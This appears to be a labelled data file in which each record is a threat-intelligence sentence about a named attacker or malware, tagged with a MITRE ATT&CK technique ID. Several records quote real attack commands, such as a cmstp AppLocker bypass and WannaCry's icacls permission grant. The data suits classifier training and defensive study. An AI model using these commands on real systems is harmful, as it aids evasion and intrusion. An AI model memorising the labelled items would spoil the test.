{"text1":"PROMETHIUM has attempted to get users to execute compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.","labels":"['T1204.002']"}
|
|
{"text1":"Patchwork embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware.","labels":"['T1204.002']"}
|
|
{"text1":"PoetRAT has used spearphishing attachments to infect victims.","labels":"['T1204.002']"}
|
|
{"text1":"Pony has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format).","labels":"['T1204.002']"}
|
|
{"text1":"QakBot has gained execution through users opening malicious attachments.","labels":"['T1204.002']"}
|
|
{"text1":"REvil has been executed via malicious MS Word e-mail attachments.","labels":"['T1204.002']"}
|
|
{"text1":"RTM has attempted to lure victims into opening e-mail attachments to execute malicious code.","labels":"['T1204.002']"}
|
|
{"text1":"RTM has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within.","labels":"['T1204.002']"}
|
|
{"text1":"Ramsay has been executed through malicious e-mail attachments.","labels":"['T1204.002']"}
|
|
{"text1":"Rifdoor has been executed from malicious Excel or Word documents containing macros.","labels":"['T1204.002']"}
|
|
{"text1":"SQLRat relies on users clicking on an embedded image to execute the scripts.","labels":"['T1204.002']"}
|
|
{"text1":"STARWHALE has relied on victims opening a malicious Excel file for execution.","labels":"['T1204.002']"}
|
|
{"text1":"Saint Bot has relied upon users to execute a malicious attachment delivered via spearphishing.","labels":"['T1204.002']"}
|
|
{"text1":"Sandworm Team has tricked unwitting recipients into clicking on spearphishing attachments and enabling malicious macros embedded within files.","labels":"['T1204.002']"}
|
|
{"text1":"Silence attempts to get users to launch malicious attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
|
|
{"text1":"Some SUGARDUMP variants required a user to enable a macro within a malicious .xls file for execution.","labels":"['T1204.002']"}
|
|
{"text1":"TA459 has attempted to get victims to open malicious Microsoft Word attachments sent via spearphishing.","labels":"['T1204.002']"}
|
|
{"text1":"TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and\/or .lnk files.","labels":"['T1204.002']"}
|
|
{"text1":"TA551 has prompted users to enable macros within spearphishing attachments to install malware.","labels":"['T1204.002']"}
|
|
{"text1":"The White Company has used phishing lure documents that trick users into opening them and infecting their computers.","labels":"['T1204.002']"}
|
|
{"text1":"Threat Group-3390 has lured victims into opening malicious files containing malware.","labels":"['T1204.002']"}
|
|
{"text1":"ThreatNeedle relies on a victim to click on a malicious document for initial execution.","labels":"['T1204.002']"}
|
|
{"text1":"Tonto Team has relied on user interaction to open their malicious RTF documents.","labels":"['T1204.002']"}
|
|
{"text1":"Tropic Trooper has lured victims into executing malware via malicious e-mail attachments.","labels":"['T1204.002']"}
|
|
{"text1":"WIRTE has attempted to lure users into opening malicious MS Word and Excel files to execute malicious payloads.","labels":"['T1204.002']"}
|
|
{"text1":"WarzoneRAT has relied on a victim to open a malicious attachment within an email for execution.","labels":"['T1204.002']"}
|
|
{"text1":"Windshift has used e-mail attachments to lure victims into executing malicious code.","labels":"['T1204.002']"}
|
|
{"text1":"Wizard Spider has lured victims to execute malware with spearphishing attachments containing macros to download either Emotet, Bokbot, TrickBot, or Bazar.","labels":"['T1204.002']"}
|
|
{"text1":"ZxxZ has relied on victims to open a malicious attachment delivered via email.","labels":"['T1204.002']"}
|
|
{"text1":"admin@338 has attempted to get victims to launch malicious Microsoft Word attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
|
|
{"text1":"menuPass has attempted to get victims to open malicious files such as Windows Shortcuts (.lnk) and\/or Microsoft Office documents, sent via email as part of spearphishing campaigns.","labels":"['T1204.002']"}
|
|
{"text1":"TeamTNT has relied on users to download and execute malicious Docker images.","labels":"['T1204.003']"}
|
|
{"text1":"Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port.","labels":"['T1205']"}
|
|
{"text1":"Pandora can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command.","labels":"['T1205']"}
|
|
{"text1":"Ryuk has used Wake-on-Lan to power on turned off systems for lateral movement.","labels":"['T1205']"}
|
|
{"text1":"SYNful Knock can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages.","labels":"['T1205']"}
|
|
{"text1":"Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet","labels":"['T1205']"}
|
|
{"text1":"Winnti for Linux has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism.","labels":"['T1205']"}
|
|
{"text1":"PROMETHIUM has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.","labels":"['T1205.001']"}
|
|
{"text1":"Penquin installs a `TCP` and `UDP` filter on the `eth0` interface.","labels":"['T1205.002']"}
|
|
{"text1":"APT28 exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement.","labels":"['T1210']"}
|
|
{"text1":"Conficker exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request.","labels":"['T1210']"}
|
|
{"text1":"Dragonfly has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers.","labels":"['T1210']"}
|
|
{"text1":"Earth Lusca has used Mimikatz to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472).","labels":"['T1210']"}
|
|
{"text1":"Emotet has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation.","labels":"['T1210']"}
|
|
{"text1":"Empire has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers.","labels":"['T1210']"}
|
|
{"text1":"Fox Kitten has exploited known vulnerabilities in remote services including RDP.","labels":"['T1210']"}
|
|
{"text1":"InvisiMole can spread within a network via the BlueKeep (CVE-2019-0708) and EternalBlue (CVE-2017-0144) vulnerabilities in RDP and SMB respectively.","labels":"['T1210']"}
|
|
{"text1":"Lucifer can exploit multiple vulnerabilities including EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0144).","labels":"['T1210']"}
|
|
{"text1":"MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).","labels":"['T1210']"}
|
|
{"text1":"NotPetya can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network.","labels":"['T1210']"}
|
|
{"text1":"PoshC2 contains a module for exploiting SMB via EternalBlue.","labels":"['T1210']"}
|
|
{"text1":"QakBot can move laterally using worm-like functionality through exploitation of SMB.","labels":"['T1210']"}
|
|
{"text1":"Stuxnet propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities.","labels":"['T1210']"}
|
|
{"text1":"Wizard Spider has exploited or attempted to exploit Zerologon (CVE-2020-1472) and EternalBlue (MS17-010) vulnerabilities.","labels":"['T1210']"}
|
|
{"text1":"APT28 has collected files from various information repositories.","labels":"['T1213']"}
|
|
{"text1":"APT29 has accessed victims\u2019 internal knowledge repositories (wikis) to view sensitive corporate information on products, services, and internal business operations.","labels":"['T1213']"}
|
|
{"text1":"FIN6 has collected schemas and user accounts from systems running SQL Server.","labels":"['T1213']"}
|
|
{"text1":"Fox Kitten has accessed victim security and IT environments and Microsoft Teams to mine valuable information.","labels":"['T1213']"}
|
|
{"text1":"LAPSUS$ has searched a victim's network for organization collaboration channels like MS Teams or Slack to discover further high-privilege account credentials.","labels":"['T1213']"}
|
|
{"text1":"P.A.S. Webshell has the ability to list and extract data from SQL databases.","labels":"['T1213']"}
|
|
{"text1":"LAPSUS$ has searched a victim's network for collaboration platforms like Confluence and JIRA to discover further high-privilege account credentials.","labels":"['T1213.001']"}
|
|
{"text1":"APT28 has collected information from Microsoft SharePoint services within target networks.","labels":"['T1213.002']"}
|
|
{"text1":"Ke3chang used a SharePoint enumeration and data dumping tool known as spwebmember.","labels":"['T1213.002']"}
|
|
{"text1":"LAPSUS$ has searched a victim's network for collaboration platforms like SharePoint to discover further high-privilege account credentials.","labels":"['T1213.002']"}
|
|
{"text1":"spwebmember is used to enumerate and dump information from Microsoft SharePoint.","labels":"['T1213.002']"}
|
|
{"text1":"APT29 has downloaded source code from code repositories.","labels":"['T1213.003']"}
|
|
{"text1":"APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.","labels":"['T1216.001']"}
|
|
{"text1":"APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.","labels":"['T1217']"}
|
|
{"text1":"Calisto collects information on bookmarks from Google Chrome.","labels":"['T1217']"}
|
|
{"text1":"Dtrack can retrieve browser history.","labels":"['T1217']"}
|
|
{"text1":"Empire has the ability to gather browser data such as bookmarks and visited sites.","labels":"['T1217']"}
|
|
{"text1":"Fox Kitten has used Google Chrome bookmarks to identify internal resources and assets.","labels":"['T1217']"}
|
|
{"text1":"MobileOrder has a command to upload to its C2 server victim browser bookmarks.","labels":"['T1217']"}
|
|
{"text1":"PowerLess can use a .NET browser information stealer module.","labels":"['T1217']"}
|
|
{"text1":"APT38 has used CHM files to move concealed payloads.","labels":"['T1218.001']"}
|
|
{"text1":"APT41 used compiled HTML (.chm) files for targeting.","labels":"['T1218.001']"}
|
|
{"text1":"Astaroth uses ActiveX objects for file execution and manipulation.","labels":"['T1218.001']"}
|
|
{"text1":"OilRig has used a CHM payload to load and execute another malicious file once delivered to a victim.","labels":"['T1218.001']"}
|
|
{"text1":"Silence has weaponized CHM files in their phishing campaigns.","labels":"['T1218.001']"}
|
|
{"text1":"InvisiMole can register itself for execution and persistence via the Control Panel.","labels":"['T1218.002']"}
|
|
{"text1":"Cobalt Group has used the command \"cmstp.exe \/s \/ns C:\\Users\\ADMINI~W\\AppData\\Local\\Temp\\XKNqbpzl.txt\" to bypass AppLocker and launch a malicious script.","labels":"['T1218.003']"}
|
|
{"text1":"MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.","labels":"['T1218.003']"}
|
|
{"text1":"Chaes has used InstallUtil to download content.","labels":"['T1218.004']"}
|
|
{"text1":"Saint Bot had used `InstallUtil.exe` to download and deploy executables.","labels":"['T1218.004']"}
|
|
{"text1":"WhisperGate has used `InstallUtil.exe` as part of its process to disable Windows Defender.","labels":"['T1218.004']"}
|
|
{"text1":"menuPass has used \"InstallUtil.exe\" to execute malicious software.","labels":"['T1218.004']"}
|
|
{"text1":"APT29 has used `mshta` to execute malicious scripts on a compromised host.","labels":"['T1218.005']"}
|
|
{"text1":"APT32 has used mshta.exe for code execution.","labels":"['T1218.005']"}
|
|
{"text1":"BabyShark has used mshta.exe to download and execute applications from a remote server.","labels":"['T1218.005']"}
|
|
{"text1":"Confucius has used mshta.exe to execute malicious VBScript.","labels":"['T1218.005']"}
|
|
{"text1":"During C0015, the threat actors used `mshta` to execute DLLs.","labels":"['T1218.005']"}
|
|
{"text1":"During Operation Dust Storm, the threat actors executed JavaScript code via `mshta.exe`.","labels":"['T1218.005']"}
|
|
{"text1":"Earth Lusca has used `mshta.exe` to load an HTA script within a malicious .LNK file.","labels":"['T1218.005']"}
|
|
{"text1":"FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.","labels":"['T1218.005']"}
|
|
{"text1":"Gamaredon Group has used `mshta.exe` to execute malicious HTA files.","labels":"['T1218.005']"}
|
|
{"text1":"Inception has used malicious HTA files to drop and execute malware.","labels":"['T1218.005']"}
|
|
{"text1":"Kimsuky has used mshta.exe to run malicious scripts on the system.","labels":"['T1218.005']"}
|
|
{"text1":"Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.","labels":"['T1218.005']"}
|
|
{"text1":"Lazarus Group has used \"mshta.exe\" to execute HTML pages downloaded by initial access documents.","labels":"['T1218.005']"}
|
|
{"text1":"Lazarus Group has used mshta.exe to run malicious scripts and download programs.","labels":"['T1218.005']"}
|
|
{"text1":"LazyScripter has used `mshta.exe` to execute Koadic stagers.","labels":"['T1218.005']"}
|
|
{"text1":"MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.","labels":"['T1218.005']"}
|
|
{"text1":"NanHaiShu uses mshta.exe to load its program and files.","labels":"['T1218.005']"}
|
|
{"text1":"Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.","labels":"['T1218.005']"}
|
|
{"text1":"Revenge RAT uses mshta.exe to run malicious scripts on the system.","labels":"['T1218.005']"}
|
|
{"text1":"Sibot has been executed via MSHTA application.","labels":"['T1218.005']"}
|
|
{"text1":"Sidewinder has used \"mshta.exe\" to execute malicious payloads.","labels":"['T1218.005']"}
|
|
{"text1":"TA551 has used mshta.exe to execute malicious payloads.","labels":"['T1218.005']"}
|
|
{"text1":"Xbash can use mshta for executing scripts.","labels":"['T1218.005']"}
|
|
{"text1":"AppleJeus has been installed via MSI installer.","labels":"['T1218.007']"}
|
|
{"text1":"Chaes has used .MSI files as an initial way to start the infection chain.","labels":"['T1218.007']"}
|
|
{"text1":"Clop can use msiexec.exe to disable security tools on the system.","labels":"['T1218.007']"}
|
|
{"text1":"Duqu has used \"msiexec\" to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.","labels":"['T1218.007']"}
|
|
{"text1":"FlawedAmmyy has been installed via `msiexec.exe`.","labels":"['T1218.007']"}
|
|
{"text1":"Grandoreiro can use MSI files to execute DLLs.","labels":"['T1218.007']"}
|
|
{"text1":"IcedID can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application.","labels":"['T1218.007']"}
|
|
{"text1":"Javali has used the MSI installer to download and execute malicious payloads.","labels":"['T1218.007']"}
|
|
{"text1":"LoudMiner used an MSI installer to install the virtualization software.","labels":"['T1218.007']"}
|
|
{"text1":"Machete has used msiexec to install the Machete malware.","labels":"['T1218.007']"}
|
|
{"text1":"Maze has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using \"msiexec\".","labels":"['T1218.007']"}
|
|
{"text1":"Melcoz can use MSI files with embedded VBScript for execution.","labels":"['T1218.007']"}
|
|
{"text1":"Metamorfo has used MsiExec.exe to automatically execute files.","labels":"['T1218.007']"}
|
|
{"text1":"RCSession has the ability to execute inside the msiexec.exe process.","labels":"['T1218.007']"}
|
|
{"text1":"Ragnar Locker has been delivered as an unsigned MSI package that was executed with \"msiexec.exe\".","labels":"['T1218.007']"}
|
|
{"text1":"Rancor has used \"msiexec\" to download and execute malicious installer files over HTTP.","labels":"['T1218.007']"}
|
|
{"text1":"TA505 has used \"msiexec\" to download and execute malicious Windows Installer files.","labels":"['T1218.007']"}
|
|
{"text1":"Bumblebee can use `odbcconf.exe` to run DLLs on targeted hosts.","labels":"['T1218.008']"}
|
|
{"text1":"Agent Tesla has dropped RegAsm.exe onto systems for performing malicious activity.","labels":"['T1218.009']"}
|
|
{"text1":"APT19 used Regsvr32 to bypass application control techniques.","labels":"['T1218.010']"}
|
|
{"text1":"APT32 created a Scheduled Task\/Job that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor.","labels":"['T1218.010']"}
|
|
{"text1":"AppleSeed can call regsvr32.exe for execution.","labels":"['T1218.010']"}
|
|
{"text1":"Astaroth can be loaded through regsvr32.exe.","labels":"['T1218.010']"}
|
|
{"text1":"Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using regsvr32.exe.","labels":"['T1218.010']"}
|
|
{"text1":"Cobalt Group has used regsvr32.exe to execute scripts.","labels":"['T1218.010']"}
|
|
{"text1":"Derusbi variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.","labels":"['T1218.010']"}
|
|
{"text1":"During C0015, the threat actors employed code that used `regsvr32` for execution.","labels":"['T1218.010']"}
|
|
{"text1":"EVILNUM can run a remote scriptlet that drops a file and executes it via regsvr32.exe.","labels":"['T1218.010']"}
|
|
{"text1":"Egregor has used regsvr32.exe to execute malicious DLLs.","labels":"['T1218.010']"}
|
|
{"text1":"HermeticWizard has used `regsvr32.exe \/s \/i` to execute malicious payloads.","labels":"['T1218.010']"}
|
|
{"text1":"Kimsuky has executed malware with \"regsvr32\".","labels":"['T1218.010']"}
|
|
{"text1":"Koadic can use Regsvr32 to execute additional payloads.","labels":"['T1218.010']"}
|
|
{"text1":"Lazarus Group has used regsvr32 to execute custom malware.","labels":"['T1218.010']"}
|
|
{"text1":"QakBot can use Regsvr32 to execute malicious DLLs.","labels":"['T1218.010']"}
|
|
{"text1":"Ragnar Locker has used regsvr32.exe to execute components of VirtualBox.","labels":"['T1218.010']"}
|
|
{"text1":"RogueRobin uses regsvr32.exe to run a .sct file for execution.","labels":"['T1218.010']"}
|
|
{"text1":"Saint Bot has used `regsvr32` to execute scripts.","labels":"['T1218.010']"}
|
|
{"text1":"Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload.","labels":"['T1218.010']"}
|
|
{"text1":"Valak has used \"regsvr32.exe\" to launch malicious DLLs.","labels":"['T1218.010']"}
|
|
{"text1":"WIRTE has used `regsvr32.exe` to trigger the execution of a malicious script.","labels":"['T1218.010']"}
|
|
{"text1":"Xbash can use regsvr32 for executing scripts.","labels":"['T1218.010']"}
|
|
{"text1":"A gh0st RAT variant has used rundll32 for execution.","labels":"['T1218.011']"}
|
|
{"text1":"APT19 configured its payload to inject into the rundll32.exe.","labels":"['T1218.011']"}
|
|
{"text1":"APT28 executed CHOPSTICK by using rundll32 commands such as \"rundll32.exe \u201cC:\\Windows\\twain_64.dll\u201d\". APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.","labels":"['T1218.011']"}
|
|
{"text1":"APT3 has a tool that can run DLLs.","labels":"['T1218.011']"}
|
|
{"text1":"APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.","labels":"['T1218.011']"}
|
|
{"text1":"APT41 has used rundll32.exe to execute a loader.","labels":"['T1218.011']"}
|
|
{"text1":"After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe.","labels":"['T1218.011']"}
|
|
{"text1":"Attor's installer plugin can schedule rundll32.exe to load the dispatcher.","labels":"['T1218.011']"}
|
|
{"text1":"BLINDINGCAN has used Rundll32 to load a malicious DLL.","labels":"['T1218.011']"}
|
|
{"text1":"Backdoor.Oldrea can use rundll32 for execution on compromised hosts.","labels":"['T1218.011']"}
|
|
{"text1":"BoomBox can use RunDLL32 for execution.","labels":"['T1218.011']"}
|
|
{"text1":"Briba uses rundll32 within Registry Run Keys \/ Startup Folder entries to execute malicious DLLs.","labels":"['T1218.011']"}
|
|
{"text1":"CORESHELL is installed via execution of rundll32 with an export named \"init\" or \"InitW.\"","labels":"['T1218.011']"}
|
|
{"text1":"Carbanak installs VNC server software that executes through rundll32.","labels":"['T1218.011']"}
|
|
{"text1":"Cobalt Strike can use `rundll32.exe` to load DLL from the command line.","labels":"['T1218.011']"}
|
|
{"text1":"Comnie uses Rundll32 to load a malicious DLL.","labels":"['T1218.011']"}
|
|
{"text1":"CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.","labels":"['T1218.011']"}
|
|
{"text1":"DDKONG uses Rundll32 to ensure only a single instance of itself is running at once.","labels":"['T1218.011']"}
|
|
{"text1":"During Operation Spalax, the threat actors used `rundll32.exe` to execute malicious installers.","labels":"['T1218.011']"}
|
|
{"text1":"EVILNUM can execute commands and scripts through rundll32.","labels":"['T1218.011']"}
|
|
{"text1":"Egregor has used rundll32 during execution.","labels":"['T1218.011']"}
|
|
{"text1":"FatDuke can execute via rundll32.","labels":"['T1218.011']"}
|
|
{"text1":"FlawedAmmyy has used `rundll32` for execution.","labels":"['T1218.011']"}
|
|
{"text1":"FunnyDream can use `rundll32` for execution of its components.","labels":"['T1218.011']"}
|
|
{"text1":"GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\\SYSTEM).","labels":"['T1218.011']"}
|
|
{"text1":"HAFNIUM has used \"rundll32\" to load malicious DLLs.","labels":"['T1218.011']"}
|
|
{"text1":"HermeticWizard has the ability to create a new process using `rundll32`.","labels":"['T1218.011']"}
|
|
{"text1":"InvisiMole has used rundll32.exe for execution.","labels":"['T1218.011']"}
|
|
{"text1":"KONNI has used Rundll32 to execute its loader for privilege escalation purposes.","labels":"['T1218.011']"}
|
|
{"text1":"Koadic can use Rundll32 to execute additional payloads.","labels":"['T1218.011']"}
|
|
{"text1":"Kwampirs uses rundll32.exe in a Registry value added to establish persistence.","labels":"['T1218.011']"}
|
|
{"text1":"Lazarus Group has used rundll32 to execute malicious payloads on a compromised host.","labels":"['T1218.011']"}
|
|
{"text1":"MegaCortex has used \"rundll32.exe\" to load a DLL for file encryption.","labels":"['T1218.011']"}
|
|
{"text1":"Mongall can use `rundll32.exe` for execution.","labels":"['T1218.011']"}
|
|
{"text1":"Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.","labels":"['T1218.011']"}
|
|
{"text1":"MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.","labels":"['T1218.011']"}
|
|
{"text1":"NOKKI has used rundll32 for execution.","labels":"['T1218.011']"}
|
|
{"text1":"PUNCHBUGGY can load a DLL using Rundll32.","labels":"['T1218.011']"}
|
|
{"text1":"PcShare has used `rundll32.exe` for execution.","labels":"['T1218.011']"}
|
|
{"text1":"PolyglotDuke can be executed using rundll32.exe.","labels":"['T1218.011']"}
|
|
{"text1":"PowerDuke uses rundll32.exe to load.","labels":"['T1218.011']"}
|
|
{"text1":"Pteranodon executes functions using rundll32.exe.","labels":"['T1218.011']"}
|
|
{"text1":"QakBot can use Rundll32.exe to enable C2 communication.","labels":"['T1218.011']"}
|
|
{"text1":"RTM runs its core DLL file using rundll32.exe.","labels":"['T1218.011']"}
|
|
{"text1":"Ragnar Locker has used rundll32.exe to execute components of VirtualBox.","labels":"['T1218.011']"}
|
|
{"text1":"Rundll32.exe is used as a way of executing Flame at the command-line.","labels":"['T1218.011']"}
|
|
{"text1":"Sakula calls cmd.exe to run various DLL files via rundll32.","labels":"['T1218.011']"}
|
|
{"text1":"Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe.","labels":"['T1218.011']"}
|
|
{"text1":"ServHelper contains a module for downloading and executing DLLs that leverages \"rundll32.exe\".","labels":"['T1218.011']"}
|
|
{"text1":"Sibot has executed downloaded DLLs with \"rundll32.exe\".","labels":"['T1218.011']"}
|
|
{"text1":"Squirrelwaffle has been executed using `rundll32.exe`.","labels":"['T1218.011']"}
|
|
{"text1":"StreamEx uses rundll32 to call an exported function.","labels":"['T1218.011']"}
|
|
{"text1":"TA505 has leveraged \"rundll32.exe\" to execute malicious DLLs.","labels":"['T1218.011']"}
|
|
{"text1":"TA551 has used rundll32.exe to load malicious DLLs.","labels":"['T1218.011']"}
|
|
{"text1":"The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.","labels":"['T1218.011']"}
|
|
{"text1":"USBferry can execute rundll32.exe in memory to avoid detection.","labels":"['T1218.011']"}
|
|
{"text1":"Variants of Emissary have used rundll32.exe in Registry values added to establish persistence.","labels":"['T1218.011']"}
|
|
{"text1":"ZxShell has used rundll32.exe to execute other DLLs and named pipes.","labels":"['T1218.011']"}
|
|
{"text1":"Carbanak used legitimate programs such as AmmyyAdmin and Team Viewer for remote interactive C2 to target systems.","labels":"['T1219']"}
|
|
{"text1":"Dridex contains a module for VNC.","labels":"['T1219']"}
|
|
{"text1":"During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network.","labels":"['T1219']"}
|
|
{"text1":"During Night Dragon, threat actors used several remote administration tools as persistent infiltration channels.","labels":"['T1219']"}
|
|
{"text1":"Egregor has checked for the LogMein event log in an attempt to encrypt files in remote machines.","labels":"['T1219']"}
|
|
{"text1":"Hildegard has established tmate sessions for C2 communications.","labels":"['T1219']"}
|
|
{"text1":"MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.","labels":"['T1219']"}
|
|
{"text1":"Mustang Panda has installed TeamViewer on targeted systems.","labels":"['T1219']"}
|
|
{"text1":"Night Dragon has used several remote administration tools as persistent infiltration channels.","labels":"['T1219']"}
|
|
{"text1":"RTM has the capability to download a VNC module from command and control (C2).","labels":"['T1219']"}
|
|
{"text1":"Sandworm Team has used remote administration tools or remote industrial control system client software to maliciously release electricity breakers.","labels":"['T1219']"}
|
|
{"text1":"TeamTNT has established tmate sessions for C2 communications.","labels":"['T1219']"}
|
|
{"text1":"Thrip used a cloud-based remote access software called LogMeIn for their attacks.","labels":"['T1219']"}
|
|
{"text1":"Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain.","labels":"['T1220']"}
|
|
{"text1":"Higaisa used an XSL file to run VBScript code.","labels":"['T1220']"}
|
|
{"text1":"Lazarus Group has used WMIC to execute a remote XSL script to establish persistence.","labels":"['T1220']"}
|
|
{"text1":"APT28 used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro.","labels":"['T1221']"}
|
|
{"text1":"Chaes changed the template target of the settings.xml file embedded in the Word document and populated that field with the downloaded URL of the next payload.","labels":"['T1221']"}
|
|
{"text1":"DarkHydrus used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable Forced Authentication.","labels":"['T1221']"}
|
|
{"text1":"Dragonfly 2.0 has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.","labels":"['T1221']"}
|
|
{"text1":"Dragonfly has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.","labels":"['T1221']"}
|
|
{"text1":"During Frankenstein, the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.","labels":"['T1221']"}
|
|
{"text1":"Frankenstein has used trojanized documents that retrieve remote templates from an adversary-controlled website.","labels":"['T1221']"}
|
|
{"text1":"Gamaredon Group has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads. Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems.","labels":"['T1221']"}
|
|
{"text1":"Tropic Trooper delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE (XLS) document.","labels":"['T1221']"}
|
|
{"text1":"WarzoneRAT has been installed via template injection through a malicious DLL embedded within a template RTF in a Word document.","labels":"['T1221']"}
|
|
{"text1":"BitPaymer can use \"icacls \/reset\" and \"takeown \/F\" to reset a targeted executable's permissions and then take ownership.","labels":"['T1222.001']"}
|
|
{"text1":"Grandoreiro can modify the binary ACL to prevent security tools from running.","labels":"['T1222.001']"}
|
|
{"text1":"WannaCry uses \"attrib +h\" and \"icacls . \/grant Everyone:F \/T \/C \/Q\" to make some of its files hidden and grant all users full access controls.","labels":"['T1222.001']"}
|
|
{"text1":"WastedLocker has a command to take ownership of a file and reset the ACL permissions using the \"takeown.exe \/F filepath\" command.","labels":"['T1222.001']"}
|
|
{"text1":"Wizard Spider has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders.","labels":"['T1222.001']"}
|
|
{"text1":"Bundlore changes the permissions of a payload using the command \"chmod -R 755\".","labels":"['T1222.002']"}
|
|
{"text1":"Dok gives all users execute permissions for the application using the command \"chmod +x \/Users\/Shared\/AppStore.app\".","labels":"['T1222.002']"}
|
|
{"text1":"Kinsing has used chmod to modify permissions on key files for use.","labels":"['T1222.002']"}
|
|
{"text1":"OSX\/Shlayer can use the \"chmod\" utility to set a file as executable, such as \"chmod 777\" or \"chmod +x\".","labels":"['T1222.002']"}
|
|
{"text1":"OSX_OCEANLOTUS.D has changed permissions of a second-stage payload to an executable via \"chmod\".","labels":"['T1222.002']"}
|
|
{"text1":"P.A.S. Webshell has the ability to modify file permissions.","labels":"['T1222.002']"}
|
|
{"text1":"Penquin can add the executable flag to a downloaded file.","labels":"['T1222.002']"}
|
|
{"text1":"Rocke has changed file permissions of files so they could not be modified.","labels":"['T1222.002']"}
|
|
{"text1":"TeamTNT has modified the permissions on binaries with \"chattr\".","labels":"['T1222.002']"}
|
|
{"text1":"Anchor can terminate itself if specific execution flags are not present.","labels":"['T1480']"}
|
|
{"text1":"BitPaymer compares file names and paths to a list of excluded names and directory names during encryption.","labels":"['T1480']"}
|
|
{"text1":"EnvyScout can call \"window.location.pathname\" to ensure that embedded files are being executed from the C: drive, and will terminate if they are not.","labels":"['T1480']"}
|
|
{"text1":"SUNSPOT only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values.","labels":"['T1480']"}
|
|
{"text1":"Small Sieve can only execute correctly if the word `Platypus` is passed to it on the command line.","labels":"['T1480']"}
|
|
{"text1":"Stuxnet checks for specific operating systems on 32-bit machines, Registry keys, and dates for vulnerabilities, and will exit execution if the values are not met.","labels":"['T1480']"}
|
|
{"text1":"Torisma is only delivered to a compromised host if the victim's IP address is on an allow-list.","labels":"['T1480']"}
|
|
{"text1":"VaporRage has the ability to check for the presence of a specific DLL and terminate if it is not found.","labels":"['T1480']"}
|
|
{"text1":"APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.","labels":"['T1480.001']"}
|
|
{"text1":"Equation has been observed utilizing environmental keying in payload delivery.","labels":"['T1480.001']"}
|
|
{"text1":"ROKRAT relies on a specific victim hostname to execute and decrypt important strings.","labels":"['T1480.001']"}
|
|
{"text1":"The Winnti for Windows dropper component can verify the existence of a single command line parameter and either terminate if it is not found or later use it as a decryption key.","labels":"['T1480.001']"}
|
|
{"text1":"Bazar can use Nltest tools to obtain information about the domain.","labels":"['T1482']"}
|
|
